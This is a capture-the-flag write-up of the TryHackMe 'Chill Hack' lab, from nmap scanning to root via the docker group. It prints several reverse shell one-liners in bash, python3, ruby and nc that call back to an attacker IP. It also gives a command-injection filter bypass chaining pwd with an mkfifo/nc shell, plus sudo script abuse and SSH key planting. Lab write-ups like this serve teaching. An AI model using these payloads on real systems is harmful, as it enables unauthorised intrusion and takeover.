CTF-Writeups/TryHackMe/Chill_Hack.md
2020-12-10 00:32:57 +05:00

7.1 KiB

TryHackMe-Chill Hack

NMAP

Nmap scan report for 10.10.244.249                                                                                                             [4/7]
Host is up (0.41s latency).          
Not shown: 997 closed ports          
PORT   STATE SERVICE VERSION                                              
21/tcp open  ftp     vsftpd 3.0.3                                         
| ftp-anon: Anonymous FTP login allowed (FTP code 230)                    
|_-rw-r--r--    1 1001     1001           90 Oct 03 04:33 note.txt                                                                                  
| ftp-syst:                                                               
|   STAT:                                                                 
| FTP server status:                                                      
|      Connected to ::ffff:10.2.54.209                                    
|      Logged in as ftp                                                   
|      TYPE: ASCII                   
|      No session bandwidth limit                                                                                                                   
|      Session timeout in seconds is 300                                  
|      Control connection is plain text                                                                                                             
|      Data connections will be plain text                                                                                                          
|      At session startup, client count was 2                                                                                                       
|      vsFTPd 3.0.3 - secure, fast, stable                                
|_End of status                                                           
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)                                                                   
| ssh-hostkey:                                                                                                                                      
|   2048 09:f9:5d:b9:18:d0:b2:3a:82:2d:6e:76:8c:c2:01:44 (RSA)                                                                                      
|   256 1b:cf:3a:49:8b:1b:20:b0:2c:6a:a5:51:a8:8f:1e:62 (ECDSA)                                                                                     
|_  256 30:05:cc:52:c6:6f:65:04:86:0f:72:41:c8:a4:39:cf (ED25519)                                                                                   
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))                                                                                                 
|_http-server-header: Apache/2.4.29 (Ubuntu)                              
|_http-title: Game Info              
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .                                                      
Nmap done: 1 IP address (1 host up) scanned in 68.20 seconds                

PORT 80

PORT 21

We see from the nmap results that anonymous login on ftp is enabled ,

We can only find a note.txt file

Anurodh told me that there is some filtering on strings being put in the command -- Apaar

By reading this we can assume that there are two users anurodh and appar.

Gobuster

Let's do a directory brute force on the web page

We are presented a page where we can input something and it's always good to try some system commands to check if there exists RCE (Remote Code Execution)

So I'll try running a command pwd which will print the current working directory

And it does work so let's try to input a reverse shell command so that we may get our intial foothold.But problem is that it's filtering the input so if we try to input something malicious it's going to filter that out like ruuning these reverse shells

bash -i >& /dev/tcp/10.2.54.209/2222 0>&1

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.2.54.209",2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])

ruby -rsocket -e'f=TCPSocket.open("10.2.54.209",2222).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

nc -e /bin/sh 10.2.54.209 4444

But if we combine commands togther like

pwd;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.2.54.209 2222 >/tmp/f

We are in the box as www-data

Running sudo -l will tell us that what we could run as other user or as root so in this case we run a file as user apaar

Now before running it let's see what the script does

So It's going to take two inputs first input $person would mean nothing it can be random string since it is only being printed another input $msg will goto a command $msg 2>/dev/null so we can try running a command like cat local.txt which is our user flag and it's going to redirect any output errors to null so basically we can run any command as user apaar

Try running /bin/sh to see if it get a shell as appar

Transfer linpeas on the box

Running linepeas I didn't find much but saw that there are two ports on localhost 3306 which is mysql and 9001 which we can acess through ssh portforwarding

Before doing that let's generate a public and private key for ssh for that use ssh-keygen then copy the contents of id_rsa.pub into authorized_keys

ssh -L 9001:localhost:9001 apaar@10.10.165.124 -i id_rsa

After doing that we can visit that port

Let's visit var/www

The step for ssh portforwarding wasn't needed as we could have just grab that picture or visted the page /hacker.php and it's uselsess to go for finding mysql username and password as it is just a rabbit hole I would say it was waste of time

Anyway,

And this archive is password protected so we have to use a password cracking tool , the one that I use is called fcrackzip

On reading that extract source code file we can fine a base64 enconded text which could be a user password

And we are now logged in as anurodh and we can see that this user is in the group of docker

Looking at privilege escalation for docker on GTFOBINS

We are root !!!